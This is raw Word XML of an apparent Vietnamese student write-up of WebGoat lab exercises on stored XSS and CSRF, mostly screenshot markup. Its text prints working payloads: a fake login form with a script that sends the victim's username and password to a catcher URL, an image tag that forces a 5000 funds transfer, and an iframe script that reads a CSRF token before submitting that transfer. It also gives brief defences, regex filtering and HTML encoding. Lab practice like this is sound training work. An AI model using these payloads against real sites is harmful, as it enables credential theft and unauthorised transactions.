          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6658C3AD" wp14:editId="059921B3">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69E0678C" w14:textId="4FAF5430" w:rsidR="009B1B3A" w:rsidRDefault="009B1B3A" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68A484EE" wp14:editId="1E1CBDF0">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143D9187" w14:textId="66685B0E" w:rsidR="009B1B3A" w:rsidRDefault="009B1B3A" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11A548A4" wp14:editId="38B3D7BE">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4C7A096B" w14:textId="0194090E" w:rsidR="009B1B3A" w:rsidRDefault="009B1B3A" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A3D810A" wp14:editId="76AA628F">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272C105D" w14:textId="11634193" w:rsidR="009B1B3A" w:rsidRDefault="009B1B3A" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A402997" wp14:editId="4D45FF62">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27D75841" w14:textId="04F6F31E" w:rsidR="009B1B3A" w:rsidRDefault="009B1B3A" w:rsidP="00A63200">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vì ở đây </w:t>
      </w:r>
      <w:r w:rsidR="00620C5F">
        <w:t>sau khi hoàn thành stage 1, sẽ không thể đăng nhập lại được sau khi logout Jane, vậy nên ta ấn back để hoàn thành có thể đăng nhập</w:t>
      </w:r>
      <w:r w:rsidR="00C75C6E">
        <w:t xml:space="preserve"> lại mà không bị phát sinh lỗi đăng nhập dù đã nhập đúng pass</w:t>
      </w:r>
      <w:r w:rsidR="00620C5F">
        <w:t xml:space="preserve"> và hoàn thành stage 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED41A5E" w14:textId="3FDBD2D1" w:rsidR="009A285A" w:rsidRDefault="009A285A" w:rsidP="000B3EC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F337876" wp14:editId="63646CC7">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7717A122" w14:textId="4533D2F7" w:rsidR="009B1B3A" w:rsidRDefault="009B1B3A" w:rsidP="000B3EC8"/>
    <w:p w14:paraId="7306E320" w14:textId="6BF49843" w:rsidR="0030386D" w:rsidRDefault="0030386D" w:rsidP="0030386D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="218231AF" wp14:editId="368DE59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280186A3" w14:textId="13D0AA3F" w:rsidR="0030386D" w:rsidRDefault="0030386D" w:rsidP="0030386D">
      <w:r>
        <w:t xml:space="preserve">Theo đây ta có thể thấy Khi search bằng HTML thì </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1A163E" w14:textId="23927271" w:rsidR="0030386D" w:rsidRDefault="0030386D" w:rsidP="0030386D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ta có thể thêm 1 form vào bằng cách này </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443D106C" w14:textId="0124E379" w:rsidR="0055309C" w:rsidRDefault="0055309C" w:rsidP="0055309C">
      <w:r w:rsidRPr="0055309C">
        <w:t>&lt;/form&gt;&lt;form name="phish"&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H3&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type="text" name="user"&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type="password" name="pass"&gt;&lt;br&gt;&lt;input type="submit" name="login" value="login" onclick="hack()"&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30958FC6" w14:textId="18340097" w:rsidR="0030386D" w:rsidRDefault="0030386D" w:rsidP="0030386D">
      <w:r>
        <w:t xml:space="preserve">Vậy ta cần thêm 1 đoạn script sẽ đọc form này và </w:t>
      </w:r>
      <w:r w:rsidR="0055309C">
        <w:t xml:space="preserve">gửi về cho attacker với source nhận là: </w:t>
      </w:r>
      <w:r w:rsidR="0055309C" w:rsidRPr="0055309C">
        <w:t>"http://localhost/WebGoat/catcher?PROPERTY=yes&amp;user=" + document.phish.user.value + "&amp;password=" + document.phish.pass.value + ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E075C93" w14:textId="43EE53C1" w:rsidR="0055309C" w:rsidRDefault="0055309C" w:rsidP="0055309C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Script ta cần sẽ như thế này </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E88576A" w14:textId="59B552DB" w:rsidR="0030386D" w:rsidRDefault="0055309C" w:rsidP="0030386D">
      <w:r w:rsidRPr="0055309C">
        <w:t xml:space="preserve">&lt;script&gt;function hack() {XSSImage = new Image;XSSImage.src = "http://localhost/WebGoat/catcher?PROPERTY=yes&amp;user=" + document.phish.user.value + "&amp;password=" + document.phish.pass.value + "";alert("Hacked: User Name = " + document.phish.user.value + "Password = " + document.phish.pass.value);}&lt;/script&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E86AFC" w14:textId="1C38855C" w:rsidR="0055309C" w:rsidRDefault="0055309C" w:rsidP="0055309C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Code đầy đủ sẽ là sự kết hợp giữa 2 đoạn HTML và JS trên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F60E02E" w14:textId="42EA76D9" w:rsidR="0055309C" w:rsidRDefault="0055309C" w:rsidP="0055309C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BCB91FB" wp14:editId="505E0B75">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37DE3986" w14:textId="7C28DE1D" w:rsidR="0055309C" w:rsidRDefault="0055309C" w:rsidP="0055309C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EDE09E8" wp14:editId="5FC3F8B3">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46DDFEBD" w14:textId="35CA13B4" w:rsidR="0055309C" w:rsidRDefault="0055309C" w:rsidP="0055309C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1764FEF0" wp14:editId="5658AC49">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2462B0F1" w14:textId="5706A574" w:rsidR="00481C4D" w:rsidRDefault="00481C4D" w:rsidP="0055309C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C814E8F" wp14:editId="521B621C">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35064AA7" w14:textId="4CAD3369" w:rsidR="00481C4D" w:rsidRDefault="00481C4D" w:rsidP="0055309C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="038B3ACB" wp14:editId="0E722975">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2B9A2F0B" w14:textId="271BA1A1" w:rsidR="00481C4D" w:rsidRDefault="00481C4D" w:rsidP="0055309C"/>
    <w:p w14:paraId="512E9584" w14:textId="2F01F042" w:rsidR="00481C4D" w:rsidRDefault="00481C4D" w:rsidP="0055309C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73475BDC" wp14:editId="4437E2BB">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786AE306" w14:textId="36062F14" w:rsidR="00481C4D" w:rsidRDefault="00481C4D" w:rsidP="0055309C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="234FEA43" wp14:editId="2692C745">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7C616580" w14:textId="11652B39" w:rsidR="002C13A0" w:rsidRDefault="00CF6259" w:rsidP="0055309C">
      <w:r>
        <w:t>Để chống lại việc này ta sẽ áp dụng Regex để bắt lỗi format chuỗi nhập vào.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40273EC4" w14:textId="4B853B96" w:rsidR="00CF6259" w:rsidRDefault="00CF6259" w:rsidP="0055309C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7367C13E" wp14:editId="68C2B9F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514BC56E" w14:textId="1E87849E" w:rsidR="003876E7" w:rsidRDefault="003876E7" w:rsidP="0055309C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E9C16C7" wp14:editId="6D101F23">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4FF76176" w14:textId="4BF60A73" w:rsidR="003876E7" w:rsidRDefault="003876E7" w:rsidP="0055309C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1563161B" wp14:editId="1D1C65D8">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38FBC315" w14:textId="44408480" w:rsidR="0049607F" w:rsidRDefault="0049607F" w:rsidP="0055309C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17B153A3" wp14:editId="1184875F">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2B9FBDE2" w14:textId="527A7335" w:rsidR="000C0AC3" w:rsidRDefault="00D50A5A" w:rsidP="0055309C">
      <w:r>
        <w:t>Để xuất dữ liệu ra mà không</w:t>
      </w:r>
      <w:r w:rsidR="00C24029">
        <w:t xml:space="preserve"> bị các đoạn XSS đã update vào phá ta cần encode dữ liệu trước khi xuất bằng hàm </w:t>
      </w:r>
      <w:r w:rsidR="00C24029" w:rsidRPr="00C24029">
        <w:t>HtmlEncoder.encode(</w:t>
      </w:r>
      <w:r w:rsidR="00C24029">
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidR="00C24029" w:rsidRPr="00C24029">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00C24029">
        <w:t xml:space="preserve"> được hỗ trợ tại thư viện </w:t>
      </w:r>
      <w:r w:rsidR="00C24029" w:rsidRPr="00C24029">
        <w:t>org.owasp.webgoat.util</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA28967" w14:textId="1391920E" w:rsidR="000265BB" w:rsidRDefault="000265BB" w:rsidP="0055309C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C0956F7" wp14:editId="1D0E20D4">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529CDFB4" w14:textId="09A60EE3" w:rsidR="000265BB" w:rsidRDefault="000265BB" w:rsidP="0055309C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="006EADBD" wp14:editId="5D4C06FD">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4295CA0B" w14:textId="511E9336" w:rsidR="00C4254D" w:rsidRDefault="00C4254D" w:rsidP="0055309C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67CD2B75" wp14:editId="0054D29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1D02619A" w14:textId="5280D778" w:rsidR="00C4254D" w:rsidRDefault="00C4254D" w:rsidP="0055309C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C367367" wp14:editId="72D31DB7">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33D6E8F1" w14:textId="2E1C1365" w:rsidR="00C4254D" w:rsidRDefault="00C4254D" w:rsidP="0055309C">
      <w:r>
        <w:t>Tương tự Stage 1 ta cũng điền 1 đoạn script vào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A38770" w14:textId="20F9BA28" w:rsidR="00481C4D" w:rsidRDefault="00C4254D" w:rsidP="0055309C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1643349C" wp14:editId="6AC63F8C">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2767601B" w14:textId="6D67CAFD" w:rsidR="00A03AF2" w:rsidRDefault="00A03AF2" w:rsidP="0055309C">
      <w:r>
        <w:t>Để ngăn chặn các đoạn script thì ta cũng phải lọc nó tương tự Stage 4 bằng Regex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E3345C" w14:textId="3FCAB7E6" w:rsidR="00A03AF2" w:rsidRDefault="00A03AF2" w:rsidP="0055309C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5418431A" wp14:editId="6513B319">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5EFDC905" w14:textId="2866FA17" w:rsidR="00A03AF2" w:rsidRDefault="00A03AF2" w:rsidP="0055309C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34BC554D" wp14:editId="5AEC93B3">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1194FB48" w14:textId="3B7C00E7" w:rsidR="008923DA" w:rsidRDefault="00F75998" w:rsidP="0055309C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32CA3B56" wp14:editId="664956AA">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1F3B7B81" w14:textId="5868868E" w:rsidR="008A5B35" w:rsidRDefault="008A5B35" w:rsidP="0055309C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22AC9D94" wp14:editId="7A102501">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14:paraId="3CFEE4B5" w14:textId="2887B003" w:rsidR="008A5B35" w:rsidRDefault="008A5B35" w:rsidP="0055309C">
      <w:r>
        <w:t>Tương tự Stage 5 ta sẽ có đoạn code này để lấy Cookie người dùng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5358E550" w14:textId="787819DC" w:rsidR="008A5B35" w:rsidRDefault="008A5B35" w:rsidP="0055309C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22ECA1E6" wp14:editId="726E040C">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328504A9" w14:textId="3548BDA0" w:rsidR="008A5B35" w:rsidRDefault="008A5B35" w:rsidP="0055309C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A543AF5" wp14:editId="5BFDDE5F">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429F782B" w14:textId="4192485E" w:rsidR="008A5B35" w:rsidRDefault="008A5B35" w:rsidP="0055309C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29627B87" wp14:editId="27C4BCF8">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23EF028F" w14:textId="34B81535" w:rsidR="008A5B35" w:rsidRDefault="008A5B35" w:rsidP="0055309C">
      <w:r>
        <w:t>Và cùng làm tương tự câu trên ta cũng dùng XSS để có thể submit 3 digits access code mà không cần nhập</w:t>
      </w:r>
      <w:r w:rsidR="00DC13BD">
        <w:t xml:space="preserve"> vì đoạn script trên sẽ luôn đúng và thực thi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15125671" w14:textId="0F72D0A3" w:rsidR="006A513F" w:rsidRDefault="006A513F" w:rsidP="0055309C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="131AADA6" wp14:editId="0440A08F">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14:paraId="42BAA41A" w14:textId="64E87035" w:rsidR="006A513F" w:rsidRDefault="006A513F" w:rsidP="0055309C"/>
    <w:p w14:paraId="44259C96" w14:textId="71F4FF94" w:rsidR="006A513F" w:rsidRDefault="006A513F" w:rsidP="0055309C"/>
    <w:p w14:paraId="194C833C" w14:textId="77777777" w:rsidR="006A513F" w:rsidRDefault="006A513F" w:rsidP="0055309C"/>
    <w:p w14:paraId="764F0CDC" w14:textId="18BAE5C0" w:rsidR="006A513F" w:rsidRDefault="006A513F" w:rsidP="007355EF">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Theo như trang Respond thì ta sẽ nhận được một đoạn chuỗi đã được dịch bởi HTML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550CAB59" w14:textId="4F91B2DA" w:rsidR="006A513F" w:rsidRDefault="006A513F" w:rsidP="007355EF">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vậy ta cần phải chèn vào đây 1 bức ảnh để che dấu src là link hoặc bất kì hành động nào như chuyển khoảng 5000 chẳng hạn, người khác nhận email hoặc trong Group chat khi ấn vào sẽ bị nhận link chuyển khoản mà ta đã set sẵn từ trước </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23873DCC" w14:textId="5D040FBC" w:rsidR="00AF2F3F" w:rsidRDefault="00AF2F3F" w:rsidP="007355EF">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF2F3F">
        <w:t>&lt;img src='attack?Screen=2078372&amp;menu=900&amp;transferFunds=5000'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDC98E7" w14:textId="10099198" w:rsidR="00AF2F3F" w:rsidRDefault="00AF2F3F" w:rsidP="007355EF">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Tuỳ thuộc vào nhu cầu src sẽ thay đổi để đáp ứng nhu cầu của attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A233BA0" w14:textId="3668EF14" w:rsidR="00B562AB" w:rsidRDefault="00B562AB" w:rsidP="007355EF">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EC9E46D" wp14:editId="5F9D739B">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14:paraId="72A8B013" w14:textId="1DFF0CF9" w:rsidR="00B562AB" w:rsidRDefault="00FD6C6C" w:rsidP="007355EF">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77314A55" wp14:editId="1328C44A">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14:paraId="5CA167E0" w14:textId="5DF749AF" w:rsidR="00FD6C6C" w:rsidRDefault="00FD6C6C" w:rsidP="007355EF">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Tương tự ở trên ta cũng có thể tạo các iframe để hiển thị rỏ hơn nhằm dụ người dùng tin hơn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D2A765" w14:textId="2985E9F9" w:rsidR="00FD6C6C" w:rsidRDefault="00FD6C6C" w:rsidP="007355EF">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74C41156" wp14:editId="2B8507B8">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116DBDEA" w14:textId="15A56DF8" w:rsidR="00FD6C6C" w:rsidRDefault="00FD6C6C" w:rsidP="007355EF">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4105076C" wp14:editId="743E508F">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06788BDA" w14:textId="1BB0E654" w:rsidR="00FD6C6C" w:rsidRDefault="00FD6C6C" w:rsidP="007355EF">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="216CCF56" wp14:editId="6B4A47C9">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6C80E52D" w14:textId="408E1EF9" w:rsidR="00FD6C6C" w:rsidRDefault="00FD6C6C" w:rsidP="007355EF">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Tương tự câu trên, ở đây ta phải lấy</w:t>
      </w:r>
      <w:r w:rsidR="001F6D78">
        <w:t xml:space="preserve"> thêm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> được Token</w:t>
      </w:r>
      <w:r w:rsidR="001F6D78">
        <w:t xml:space="preserve"> để xác mình sau đó mới có thể thực hiện mục đích chuyển khoản</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27470116" w14:textId="0E56E4A9" w:rsidR="00445CE0" w:rsidRDefault="00445CE0" w:rsidP="007355EF">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Theo hướng dẫn code thực thi ở phần message là </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368ED22E" w14:textId="360F861B" w:rsidR="00445CE0" w:rsidRDefault="00445CE0" w:rsidP="00445CE0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00445CE0">
        <w:t xml:space="preserve">&lt;script&gt;var tokensuffix;function readFrame1(){var frameDoc = document.getElementById("frame1").contentDocument;var form = </w:t>
      </w:r>
      <w:r w:rsidRPr="00445CE0">
        <w:lastRenderedPageBreak/>
        <w:t>frameDoc.getElementsByTagName("form")[0];tokensuffix = '&amp;CSRFToken=' + form.CSRFToken.value;loadFrame2();}function loadFrame2(){var testFrame = document.getElementById("frame2");testFrame.src="http://localhost:8080/WebGoat/attack?Screen=XXX&amp;menu=YYY&amp;transferFunds=5000" + tokensuffix;}&lt;/script&gt;&lt;iframe</w:t>
      </w:r>
      <w:r w:rsidRPr="00445CE0">
        <w:tab/>
        <w:t>src="http://localhost:8080/WebGoat/attack?Screen=XXX&amp;menu=YYY&amp;transferFunds=main"onload="readFrame1();"id="frame1" frameborder="1" marginwidth="0"marginheight="0" width="800" scrolling=yes height="300"&gt;&lt;/iframe&gt;&lt;iframe id="frame2" frameborder="1" marginwidth="0"marginheight="0" width="800" scrolling=yes height="300"&gt;&lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C98979F" w14:textId="701C6776" w:rsidR="00445CE0" w:rsidRDefault="00445CE0" w:rsidP="007355EF">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Và ở Tittle là </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBA11E8" w14:textId="54BE819B" w:rsidR="00445CE0" w:rsidRDefault="00445CE0" w:rsidP="00445CE0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00445CE0">
        <w:t xml:space="preserve">&lt;form accept-charset='UNKNOWN' id='transferForm' method='POST' action='attack?Screen=XXX&amp;menu=YYY' enctype='application/x-www-form-urlencoded'&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00445CE0">
        <w:tab/>
        <w:t xml:space="preserve">&lt;input name='transferFunds' type='text' value='0'&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00445CE0">
        <w:tab/>
        <w:t xml:space="preserve">&lt;input name='CSRFToken' type='hidden' value='1745740650'&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00445CE0">
        <w:tab/>
        <w:t>&lt;input type='submit'&gt; &lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7EE8FB" w14:textId="75B864C9" w:rsidR="00445CE0" w:rsidRDefault="00445CE0" w:rsidP="00445CE0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Theo đó ta có thể lấy được giá trị tại </w:t>
      </w:r>
      <w:r w:rsidRPr="00445CE0">
        <w:t xml:space="preserve">'CSRFToken' </w:t>
      </w:r>
      <w:r>
        <w:t>và dùng chính nó để gửi đi ở Tittle và nhận kết quả tại message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFF58C6" w14:textId="2B22F0BC" w:rsidR="00445CE0" w:rsidRDefault="00431F2F" w:rsidP="00445CE0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BDC6C91" wp14:editId="5EEFA893">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14:paraId="767A3442" w14:textId="5FA6FBE2" w:rsidR="00431F2F" w:rsidRDefault="00C24E1B" w:rsidP="00445CE0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B0EE50B" wp14:editId="2F01506E">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14:paraId="2419E9B7" w14:textId="32D138B0" w:rsidR="00A9417B" w:rsidRDefault="00A9417B" w:rsidP="00445CE0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58964464" wp14:editId="0EB437E6">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14:paraId="1F789261" w14:textId="77777777" w:rsidR="00A9417B" w:rsidRDefault="00A9417B" w:rsidP="00445CE0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00A941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5F43FB2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2E582DAC"/>
    <w:lvl w:ilvl="0" w:tplc="62A4A87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A01"/>
    <w:rsid w:val="000265BB"/>
    <w:rsid w:val="00064A26"/>
    <w:rsid w:val="00067D3A"/>
    <w:rsid w:val="00087933"/>
    <w:rsid w:val="000A257E"/>
    <w:rsid w:val="000B3EC8"/>
    <w:rsid w:val="000C0AC3"/>
    <w:rsid w:val="001B1667"/>
    <w:rsid w:val="001C4369"/>
    <w:rsid w:val="001F6D78"/>
    <w:rsid w:val="00251511"/>
    <w:rsid w:val="00280D4D"/>
    <w:rsid w:val="002C13A0"/>
    <w:rsid w:val="002D718D"/>
    <w:rsid w:val="003013FD"/>
    <w:rsid w:val="0030386D"/>
    <w:rsid w:val="00323328"/>
    <w:rsid w:val="00344B1A"/>
    <w:rsid w:val="00354E1B"/>
    <w:rsid w:val="003876E7"/>
    <w:rsid w:val="003F35C6"/>
    <w:rsid w:val="00401DAE"/>
